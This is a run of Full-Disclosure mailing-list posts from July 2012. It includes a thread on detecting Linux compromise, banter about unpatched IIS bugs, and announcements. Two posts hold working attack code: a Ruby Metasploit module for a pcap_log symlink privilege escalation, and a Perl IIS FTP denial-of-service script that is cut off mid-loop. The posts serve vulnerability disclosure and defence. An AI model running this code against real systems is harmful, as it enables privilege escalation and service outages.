On Mon, Jul 16, 2012 at 12:23 AM, Yvan Janssens yvan.janss...@vasco.com wrote: I found an XSS vulnerability in http://eenmiljardseconden.frankdeboosere.be/ . This vulnerability was possible due to invalid input validation/bad programming. The owner was contacted and a satiric fix was deployed. ... It is now solved, and if you try to execute it again, you get a link to Rick Astley’s “Never gonna give you up” on YT. priceless! ++ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CRYPTO-GRAM, July 15, 2012
On Sat, Jul 14, 2012 at 4:25 PM, Bruce Schneier schne...@schneier.com wrote: ... Many roadside farm stands in the U.S. are unstaffed. They work on the honor system: take what you want, and pay what you owe. I like systems that leverage personal moral codes for security. But I'll bet that the pay boxes are bolted to the tables. many but not most. also, goats are exceptional sources of inspiration on side channel attacks and insider threats. more on this later.. ;) [i'd like to see a survey of info-sec specialists[0] turned ag entrepreneurs. or sechors[0] as jya calls them...] The Failure of Anti-Virus Companies to Catch Military Malware Mikko Hypponen of F-Secure attempts to explain why anti-virus companies didn't catch Stuxnet, DuQu, and Flame. His conclusion is simply that the attackers -- in this case, military intelligence agencies -- are simply better than commercial-grade anti-virus programs. this is true. they are better. I don't buy this. It isn't just the military that tests its malware against commercial defense products; criminals do it, too. many criminals are also better! ... but not most. heh Probably the people who wrote Flame had a larger budget than a large-scale criminal organization. as evidenced by novel MD5 collision attacks leveraged for windows update MitM (aka, holy grail) and expansive A/V countermeasures via, again novel, code injection methods. they also do extensive QA to ensure success against their targets, spanning whatever platform and processes. QA is expensive, and methodical QA on malware; this makes me chortle! I think the difference has more to do with the ways in which these military malware programs spread. That is, slowly and stealthily. this is intended to preserve return on investment. maybe one difference, but not the most significant. it seems clear that conventional non-military malware writers who want to evade detection should adopt the propagation techniques of Flame, Stuxnet, and DuQu. they won't and they don't need to. conventional malware targets the masses, and they're vulnerable without much effort. military malware targets the specific, and they'll do whatever they can (which is significant) to achieve success. entirely different domains! ... I think there's an interesting discussion to be had about why the anti-virus companies all missed Flame for so long. http://www.f-secure.com/weblog/archives/2388.html this is succinct and apropos. commercial A/V is not going to protect against state sponsored attacks (of which world class malware is a part). such protection requires ..., well, far more than kaspersky can ever give you :P 0. Reign of the Sechors http://cryptome.org/2012/07/sechors.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
Greetings FD, Hi Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? First thing: You can NOT surely determine if a machine is compromised within the machine itself. Once a machine is compromised it can (theoretical) react to all your approach to detect it and manipulate the output of your tools. If there is something compromised there is a high chance that it has to communicate to somebody. So you could dump the network traffic on your router or add an (transparent) networklogger between your machine and the router. Another way would be shutting down the machine an analyzing it with an live-cd. But there is not a general way to go sure, its compromised or not. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Sat, 14 Jul 2012 12:46:50 -, Ali Varshovi said: Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. It's hard to say what else to check without knowing what other concerns you're checking for, and what data sources are available (I'm thinking about auditd and friends, but there's other data sources as well). pgpHTMmfWUjpc.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
I suggest one of the first answers was the good one, intercept the traffic routed to the internet with TCPDump. Filter out the normal traffic and see what's left. All compromised systems talk to the Internet to dump data or route spam. Be patient, some systems talk all the time, some once an hour .. but you will find some unexplained traffic. Once you do find that you're infected, don't bother cleaning up the system, format and restore the data! Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 On 07/16/2012 09:40 AM, valdis.kletni...@vt.edu wrote: On Sat, 14 Jul 2012 12:46:50 -, Ali Varshovi said: Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. It's hard to say what else to check without knowing what other concerns you're checking for, and what data sources are available (I'm thinking about auditd and friends, but there's other data sources as well). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
All compromised systems talk to the Internet to dump data or route spam. yup, this is 1000% true and utterly foolproof. On Mon, Jul 16, 2012 at 2:48 PM, Gary Baribault g...@baribault.net wrote: I suggest one of the first answers was the good one, intercept the traffic routed to the internet with TCPDump. Filter out the normal traffic and see what's left. All compromised systems talk to the Internet to dump data or route spam. Be patient, some systems talk all the time, some once an hour .. but you will find some unexplained traffic. Once you do find that you're infected, don't bother cleaning up the system, format and restore the data! Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 On 07/16/2012 09:40 AM, valdis.kletni...@vt.edu wrote: On Sat, 14 Jul 2012 12:46:50 -, Ali Varshovi said: Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. It's hard to say what else to check without knowing what other concerns you're checking for, and what data sources are available (I'm thinking about auditd and friends, but there's other data sources as well). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0A29-12-2 :Metasploit 'pcap_log' plugin privilege escalation vulnerability
0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
Description:
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges
Timeline:
16 July 2012 - Reported
16 July 2012 - Acknowledged fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html
Details:
By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.
Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)
==
Sample PoC (needs work)
modules/post/linux/exploit/metasploit_pcaplog.rb
==
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' = 'Metasploit plugin pcap_log
arbirary file overwrite / privilege escalation',
'Description' = %q{ Post exploitation module to
exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to
overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},
'License' = MSF_LICENSE,
'Author'= [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Version' = '$Revision$',
'Platform' = [ 'linux' ],
'SessionTypes' = [ 'shell', 'meterpreter' ],
'References' =
[
[ 'URL',
'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'
],
[ 'URL',
'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740'
]
],
'DisclosureDate'= July 16 2012
))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime
/tmp/ with', nil]),
OptString.new('FILE', [true, 'File to
overwrite with PCAP data', nil]),
], self.class)
end
def link(t)
file_part = %s_%04d-%02d-%02d_%02d-%02d-%02d.pcap % [
msf3-session, t.year, t.month, t.mday, t.hour,
t.min, t.sec
]
fname = ::File.join(/tmp, file_part)
retval = session.shell_command(/bin/ln #{datastore['FILE']} #{fname})
end
# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+1)
end
print_status(Set #{datastore['NUMBER']} links.)
end
def cleanup
print_status(Manual cleanup required: rm -f /tmp/msf3-session*)
end
end
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. The posting included some important bugs in the Internet Information Services, one of their flagship products: http://seclists.org/fulldisclosure/2012/Jun/189 The July Security Bulletin doesn't mention any bug. http://technet.microsoft.com/en-us/security/bulletin/ms12-jul I wonder if Microsoft will silently patch the vulnerabilities or just bluntly ignore them. I understand that Microsoft doesn't want to make a big deal about the impact and exposure like in the past, yet I believe that admins should be informed about the threats by their very side. You have to remember that I put much effort into finding these vulnerabilities and you get them for free. With resolving the bugs Microsoft proves that they care about security even if these vulnerabilties where disclosed uncoordinated yet free to patch. /Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
Thanks Feighen. I had to say that I'm looking for solutions/guidelines that help in doing the analysis in a short period of time or a narrow shot of the system state. Any thoughts? Ali . - Sent from my BlackBerry device -Original Message- From: Feighen Oosterbroek feig...@gmail.com Date: Mon, 16 Jul 2012 09:26:05 To: ali.varsh...@hotmail.com Subject: Re: [Full-disclosure] Linux - Indicators of compromise Hey there are programs that can help to analyse log files. Logwatch comes to mind. There are possibly others. I suppose you could write a script to check file permissions and ownership changes over time, which could be a starting point for more in-depth checks Thanks and kind regards Feighen On 14 July 2012 14:46, Ali Varshovi ali.varsh...@hotmail.com mailto:ali.varsh...@hotmail.com wrote: Greetings FD, Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Thanks, Ali . - Sent from my BlackBerry device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Benchmark][Tool] The 2012 Web Application Scanner Benchmark Was Published
The 2012 web application vulnerability scanner benchmark was published, covering 10 crucial aspects of 60 commercial and open source web application scanners, Including: · Price Feature Comparison (New!) · Scanner Versatility Score (New!) · Path Traversal/LFI Detection Accuracy (New! - 824 test cases!) · Remote File Inclusion Detection Accuracy (New! - 114 test cases!) · SQL Injection Detection Accuracy - Updated · Cross Site Scripting Detection Accuracy - Updated · Audit Feature Comparison - Updated · WIVET score for scanners with crawling features (New!) · Scanner Adapatability, Authentication, and a variaty of other comparisons · New Products! · A step by step guide for choosing the best scanner for each task. The benchmark can be accessed through the following address: http://sectooladdict.blogspot.co.il/ The benchmark statistics can be viewed in greater detail in sectoolmarket: http://sectoolmarket.com/ Commercial scanners price vs feature comparison: http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-of-commercial-web-application-scanners.htmlhttp://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Sat, 14 Jul 2012 12:46:50 + Ali Varshovi ali.varsh...@hotmail.com wrote: Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Hi Ali, I'd say send log to another machine, use a checksumator (like tripwire), store its computation files on an external storage device and when you check the system with it, boot it on a liveCD. And as G.Baribault says, each compromised system tries to store its findings elsewhere on the Internet (often encrypted these days), so a fine traffic analyzer would be a good thing; but is there a very good one working out of the box, I don't know!? (beware it can be very disk space greedy). JY -- Overfiend well, excellent. I get to tear someone a new asshole. -- in #debian-devel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 1:24 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. Hello Full Disclosure!! !! !! Is like to introduce you to Schrödinger's Cat and Wigner's Friend in is Computer Security. 'The Wigner's Friend thought experiment posits a friend of Wigner who performs the Schrödinger's cat experiment after Wigner leaves the laboratory. Only when he returns does Wigner learn the result of the experiment from his friend, that is, whether the cat is alive or dead. The question is raised: was the state of the system a superposition of dead cat/sad friend and live cat/happy friend, only determined when Wigner learned the result of the experiment, or was it determined at some previous point?' http://en.wikipedia.org/wiki/Wigner's_friend http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat IIS is neither vulnerable or not vulnerable. Is until you is exploit it and verify! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Right - if you've compromised the server to the point you can alter directory structures/names, the you've already bypassed the ACLs required in order to exploit the vulnerability that allows you to bypass the ACLs. I don't get it. t On 7/16/12 10:47 AM, Григорий Братислава musntl...@gmail.com wrote: On Mon, Jul 16, 2012 at 1:24 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Hi Lists, it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. Hello Full Disclosure!! !! !! Is like to introduce you to Schrödinger's Cat and Wigner's Friend in is Computer Security. 'The Wigner's Friend thought experiment posits a friend of Wigner who performs the Schrödinger's cat experiment after Wigner leaves the laboratory. Only when he returns does Wigner learn the result of the experiment from his friend, that is, whether the cat is alive or dead. The question is raised: was the state of the system a superposition of dead cat/sad friend and live cat/happy friend, only determined when Wigner learned the result of the experiment, or was it determined at some previous point?' http://en.wikipedia.org/wiki/Wigner's_friend http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat IIS is neither vulnerable or not vulnerable. Is until you is exploit it and verify! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 1:54 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Right - if you've compromised the server to the point you can alter directory structures/names, the you've already bypassed the ACLs required in order to exploit the vulnerability that allows you to bypass the ACLs. I don't get it. t Please forgive him. Is only kingcope. For minute he is go loon and is this evident as is he not breaking BSD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Sat, Jul 14, 2012 at 8:46 AM, Ali Varshovi ali.varsh...@hotmail.com wrote: Greetings FD, Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Thanks, Ali Is in my experience is that I place two folders in directory in is root folder called /root/MilaKunisLeakedPhotos/ and /root/OlgaKurlyenko/ is when I see is accessed. Then I know is my machine compromised. Everyone is want see Olga and Mila ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DC4420 - London DEFCON - July meet - Tuesday July 17th 2012
OK, this is the last one before the big one! Whether you're coming to Vegas or not, you need to be here for this: Title: Hacking iOS Applications Synopsis: iOS applications are leet and cool. Let's have some fun with them! Pentester Bio: Zsombor Kovacs, Zsombor is a security geek interested in hacking iOS applications, working for an early adopter of enterprise iPad applications. Heh. Maybe he can help me unfsck my iphone... Speaking of which, what do you do when you get the dreaded 'error -1' when updating to the latest ios (5.1.1) and the apple support nazis say 'you must have tried to hack it, tough luck!'? No, really, I didn't try to hack it. Honest. No, honest, really. Look, I *know* who I am, but, honest, honest, honest, guvner, pretty please I didn't. Your stoopid update broicked it! Dammit! Anyways, moving on Venue is here: The Phoenix 37 Cavendish Square London W1G 0PP http://www.phoenixcavendishsquare.co.uk/ 2 minutes walk from Oxford Circus tube. Talks start at 19:30, kicking out at kicking out time. See you there! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 2:20 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Don't feed the trolls :D btw it's real, it's not my fault you don't understand. consult the attachment MusntLive is no troll. Is question to be asked. If is tree fall on top of you in if forest, believe you is me, is no matter is you hear it. MusntLive is work in ultra compartmentislized environment. Attachment is strip. Is can you please send in emacs format? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Hello list in my testing environment (IIS 6 with php5 ) the flaw exist . i think i got da move to XAMPP MS wont patch it LOL Test environment is not production environment. Is place your test server in your production network and is send me information for to test. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Mon, Jul 16, 2012 at 10:59 AM, Григорий Братислава musntl...@gmail.com wrote: ... Is in my experience is that I place two folders in directory in is root folder called /root/MilaKunisLeakedPhotos/ and /root/OlgaKurlyenko/ is when I see is accessed. Then I know is my machine compromised. Everyone is want see Olga and Mila there are honey tokens, and there are *honey* tokens. Григорий Братислава doing it right! ;P ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
MusntLive is find your problem:
echo
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of
Service (CPU exhaustion)
# Date: June 29, 2012
# Author: coolkaveh
# coolka...@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~
#When sending multiple parallel FTP command requests to a Microsoft
IIS FTP Server
#CPU usage goes up to max capacity and server gets non responsive.
test it with two core
#~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~
| sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:
::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g'
Is code of yours is not hacker code. MusntLive patch is your code
above. Re-test. Tested under BeOS is confirmed
On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami
kavehghaemmagh...@googlemail.com wrote:
Hi OK i will plus they didn't fix
http://seclists.org/fulldisclosure/2012/Jul/27
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of
Service (CPU exhaustion)
# Date: June 29, 2012
# Author: coolkaveh
# coolka...@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven ,
#~~~
#When sending multiple parallel FTP command requests to a Microsoft
IIS FTP Server
#CPU usage goes up to max capacity and server gets non responsive.
test it with two core
#~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
print Please DISABLE firewall daemon of this operating system first!\n;
print FTP Server Remote Denial Of Service\n;
print by coolkaveh\n;
print usage: perl killftp.pl host \n;
print example: perl killftp.pl www.example.com \n;
}
$host=shift;
$port=shift || 21;
if(!defined($host)){
print Please DISABLE firewall daemon of this operating system
first!\n;
print FTP Server Remote Denial Of Service\n;
print by coolkaveh\n;
print coolka...@rocketmail.com\n;
print usage: perl killftp.pl host \n;
print example: perl killftp.pl www.example.com \n;
exit(0);
}
$check_first=IO::Socket::INET-new(PeerAddr=$host,PeerPort=$port,Timeout=60);
if(defined $check_first){
print $host - $port is alive.\n;
$check_first-close;
}
else{
die($host - $port is closed!\n);
}
@junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
'0x1000','0x3fff','0x7ffe','0x7fff','0x8000','0xfffe','0x','0x1','0x10','1',
);
@command=(
'NLST','CWD','STOR','RETR',
'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
L','TYPE I','NLST','CWD', 'STOR','RETR','MKD',
'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
'SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
INDEX','TYPE','TYPE A','TYPE E',
'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
);
print Dosing Server!\n;
$pm = new Parallel::ForkManager(40);
while (1) {
my $pid = $pm-start and next;
COMMAND_LIST: foreach $cmd (@command){
foreach $poc (@junk){
LABEL5: $sock4=IO::Socket::INET-new(PeerAddr=$host,
PeerPort=$port, Proto='tcp', Timeout=30);
if(defined($sock4)){
Re: [Full-disclosure] Linux - Indicators of compromise
Hello everybody and thank you for your useful comments. Now I'm thinking that we need a comparison base or normal behavior profile to be able to detect any deviations or abnormal/suspicious activity. While some known patterns of behaviors are useful to detect malware or backdoors we still need that normal profile to detect 0-day or APT style intrusions. Isn't that the same idea from early days of intrusion detection research (anomaly detection approach)? Or maybe I'm off track. Thoughts? --Original Message-- To: full-disclosure@lists.grok.org.uk Subject: Linux - Indicators of compromise Sent: Jul 14, 2012 8:46 AM Greetings FD, Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Thanks, Ali . - Sent from my BlackBerry device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
SO you're talking about making a baseline? On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi ali.varsh...@hotmail.com wrote: Hello everybody and thank you for your useful comments. Now I'm thinking that we need a comparison base or normal behavior profile to be able to detect any deviations or abnormal/suspicious activity. While some known patterns of behaviors are useful to detect malware or backdoors we still need that normal profile to detect 0-day or APT style intrusions. Isn't that the same idea from early days of intrusion detection research (anomaly detection approach)? Or maybe I'm off track. Thoughts? --Original Message-- To: full-disclosure@lists.grok.org.uk Subject: Linux - Indicators of compromise Sent: Jul 14, 2012 8:46 AM Greetings FD, Does anyone have any guidelines/useful material on analysis logs of a Linux machine to detect signs of compromise? The data collection piece is not a challenge as a lot of useful information can be captured using commands and some scripts. I'm wondering if there is any systematic approach to analyze the collected logs? Most of the materials I've seen are more aligned to malware and rootkit detection which is not the only concern apparently. Thanks, Ali . - Sent from my BlackBerry device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Mon, Jul 16, 2012 at 11:52 AM, Ali Varshovi ali.varsh...@hotmail.com wrote: I'm thinking that we need a comparison base or normal behavior profile to be able to detect any deviations or abnormal/suspicious activity. While some known patterns of behaviors are useful to detect malware or backdoors we still need that normal profile to detect 0-day or APT style intrusions. Isn't that the same idea from early days of intrusion detection research (anomaly detection approach)? yes, also called: Anomaly Detection Anomaly-Based Intrusion Detection System Outlier Detection Behavior Analysis and other things i've forgotten... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
